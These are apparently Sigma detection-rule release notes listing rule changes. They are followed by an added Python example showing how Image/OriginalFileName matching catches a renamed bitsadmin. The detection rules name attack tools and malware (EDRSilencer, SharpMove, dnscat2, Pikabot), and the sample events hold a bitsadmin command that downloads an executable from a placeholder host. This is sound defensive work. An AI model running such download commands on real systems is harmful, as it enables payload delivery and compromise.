New Rules
- new: CodePage Modification Via MODE.COM
- new: CodePage Modification Via MODE.COM To Russian Language
- new: HackTool - EDRSilencer Execution - Filter Added
- new: HackTool - SharpMove Tool Execution
- new: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
- new: Rare Remote Thread Creation By Uncommon Source Image - A split of 66d31e5f-52d6-40a4-9615-002d3789a119
- new: Unsigned DLL Loaded by RunDLL32/RegSvr32
Updated Rules
- update: All Rules Have Been Deleted From The Windows Firewall Configuration - Remove the program files filter to increase coverage, as deleting all rules shouldn't be "normal" behavior regardless of which program does it.
- update: CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process - Increase coverage
- update: CreateRemoteThread API and LoadLibrary - Reduce level to medium and convert to a TH rule
- update: Critical Hive In Suspicious Location Access Bits Cleared - Enhance metadata and logic
- update: Malicious PowerShell Commandlets - PoshModule - "Start-Dnscat2"
- update: Malicious PowerShell Commandlets - ProcessCreation - "Start-Dnscat2"
- update: Malicious PowerShell Commandlets - ScriptBlock - "Start-Dnscat2"
- update: Malicious PowerShell Scripts - FileCreation - Add "dnscat2.ps1"
- update: Malicious PowerShell Scripts - PoshModule - Add "dnscat2.ps1"
- update: Monitoring For Persistence Via BITS - Use "Image" and "OriginalFileName" fields instead of CLI only
- update: Network Communication With Crypto Mining Pool - Add new domains from miningocean.org
- update: New Firewall Rule Added In Windows Firewall Exception List For Potential Suspicious Application - Add additional paths to increase coverage
- update: New Process Created Via Taskmgr.EXE - Added full paths to the filtered binaries to decrease false negatives
- update: New or Renamed User Account with '$' Character - Reduced level to "medium"
- update: Potential Dropper Script Execution Via WScript/CScript - Re-wrote the logic by removing the paths "C:\Users" and "C:\ProgramData", as these are very common and would generate a high FP rate. Switched instead to a more robust list of paths and extended the list of covered extensions. Also reduced the level to "medium"
- update: Potential Fake Instance Of Hxtsr.EXE Executed - Remove "C:" prefix from detection logic
- update: Potential Pikabot C2 Activity - Added "searchfilterhost.exe"
- update: Potential Pikabot Discovery Activity - Added "SearchProtocolHost.exe" and "SearchFilterHost.exe"
- update: Potential Pikabot Hollowing Activity - Added "searchfilterhost"
- update: Powershell Install a DLL in System Directory - enhance rule context in big script blocks
- update: Prefetch File Deleted - Update selection to remove 'C:' prefix
- update: Remote Thread Creation By Uncommon Source Image - Reduced level to medium and move high indicators to 02d1d718-dd13-41af-989d-ea85c7fab93f
- update: Rundll32 Execution With Uncommon DLL Extension - Enhanced FP filters
- update: Sensitive File Access Via Volume Shadow Copy Backup - Made the rule more generic by updating the title and removing the Conti-specific IOCs (these will be added in a dedicated rule)
- update: Shell Process Spawned by Java.EXE - Add "bash.exe"
- update: Suspicious PowerShell Download - Powershell Script - Add "DownloadFileAsync" and "DownloadStringAsync" functions
- update: Suspicious Processes Spawned by Java.EXE - Remove "bash.exe" as it doesn't fit the logic
- update: Sysmon Application Crashed - Add 32bit version of sysmon binary
- update: Tap Driver Installation - Security - Reduce level to "low"
- update: Write Protect For Storage Disabled - Remove "storagedevicepolicies" as the string "storage" already covers it
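The "Monitoring For Persistence Via BITS" change above (matching on "Image" and "OriginalFileName" rather than the command line alone) is worth a closer look, because it is a recurring pattern in rule maintenance. A rule keyed only on a substring of CommandLine misses a copied-and-renamed binary and fires on anything that merely mentions the name in its arguments. The following is an added example, not the rule text from the release or any code from the SigmaHQ repository: the two selection functions are simplified sketches of the "before" and "after" approach, and the Sysmon Event ID 1 records are constructed samples.

```python
"""Added example (not part of the Sigma release notes or repository):
why identifying the binary via Image/OriginalFileName catches a renamed
bitsadmin.exe that a CommandLine-only match misses.

The selection functions below are simplified sketches of the approach
described in the changelog, not the actual rule logic."""

# Constructed Sysmon Event ID 1 (process creation) samples.
SAMPLE_EVENTS = [
    {   # bitsadmin run from its real path; both approaches should fire
        "Image": r"C:\Windows\System32\bitsadmin.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "bitsadmin /transfer job /download "
                       "http://example.invalid/a.exe C:\\Users\\Public\\a.exe",
    },
    {   # bitsadmin copied and renamed; the name is gone from the command line,
        # but the PE version resource (OriginalFileName) still says bitsadmin.exe
        "Image": r"C:\Users\Public\svchost.exe",
        "OriginalFileName": "bitsadmin.exe",
        "CommandLine": "svchost /transfer job /download "
                       "http://example.invalid/a.exe C:\\Users\\Public\\a.exe",
    },
    {   # benign: cmd.exe merely echoing the words; a CLI-only rule false-positives
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd /c echo bitsadmin /transfer",
    },
]


def _norm(value):
    # Sigma string modifiers are case-insensitive by default; mirror that here.
    return (value or "").lower()


def sigma_contains_all(value, *needles):
    """Equivalent of a `field|contains|all:` list in a Sigma selection."""
    haystack = _norm(value)
    return all(_norm(n) in haystack for n in needles)


def sigma_endswith(value, suffix):
    """Equivalent of a `field|endswith:` entry in a Sigma selection."""
    return _norm(value).endswith(_norm(suffix))


def cli_only_selection(event):
    """Sketch of the old approach: everything keyed on CommandLine (assumption)."""
    return sigma_contains_all(event.get("CommandLine"), "bitsadmin", "/transfer")


def image_selection(event):
    """Sketch of the updated approach: identify the binary by its path or its
    PE OriginalFileName, then inspect the arguments (assumption)."""
    is_bitsadmin = (
        sigma_endswith(event.get("Image"), r"\bitsadmin.exe")
        or _norm(event.get("OriginalFileName")) == "bitsadmin.exe"
    )
    return is_bitsadmin and sigma_contains_all(event.get("CommandLine"), "/transfer")


def evaluate(events, selection):
    """Return the indices of events the given selection matches."""
    return [i for i, ev in enumerate(events) if selection(ev)]


if __name__ == "__main__":
    print("CommandLine only:", evaluate(SAMPLE_EVENTS, cli_only_selection))  # [0, 2]
    print("Image/OriginalFileName:", evaluate(SAMPLE_EVENTS, image_selection))  # [0, 1]
```

The CLI-only sketch misses the renamed copy (event 1) and fires on the harmless echo (event 2); the Image/OriginalFileName sketch gets both right. One caveat a practitioner should keep in mind: OriginalFileName is read from the PE version resource and can be stripped or edited by an attacker who controls the binary, so it raises the bar rather than closing the gap; pairing the rule with hash or signer information (Sysmon "Hashes"/"Signature" fields where available) is the stronger check.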
Removed / Deprecated Rules
- remove: Dnscat Execution - Deprecated in favour of an integration in the "Malicious PowerShell Cmdlet" type of rules
- remove: SAM Dump to AppData
Fixed Rules
- fix: CobaltStrike Named Pipe Patterns - Add Websense named pipe filter
- fix: EventLog Query Requests By Builtin Utilities - Typo in wmic process name
- fix: Firewall Rule Modified In The Windows Firewall Exception List - new optional filter Brave browser
- fix: Kerberos Manipulation - Update field to use Status instead of incorrect "FailureCode"
- fix: Metasploit SMB Authentication - Remove unnecessary field
- fix: Outbound RDP Connections Over Non-Standard Tools - new FP filter for RAS TSplus
- fix: PowerShell Core DLL Loaded By Non PowerShell Process - new optional filter for chocolatey
- fix: Remote Thread Creation In Mstsc.Exe From Suspicious Location - Fix a broken path string
- fix: Remote Thread Creation In Uncommon Target Image - Reduce level to medium and remove explorer as target due to FP rates.
- fix: Service Installation in Suspicious Folder - Update FP filter
- fix: Uncommon New Firewall Rule Added In Windows Firewall Exception List - Fix the filters to be more generic
Acknowledgement
Thanks to @CrimpSec, @frack113, @jstnk9, @nasbench, @phantinuss, @qasimqlf, @slincoln-aiq, @swachchhanda000, @t-pol, @tr0mb1r, @xiangchen96 for their contribution to this release
Which Sigma rule package should I use?
A detailed explanation can be found in the Releases.md file. If you are new to Sigma, we recommend starting with the "Core" ruleset.
The latest release package on GitHub can always be found here.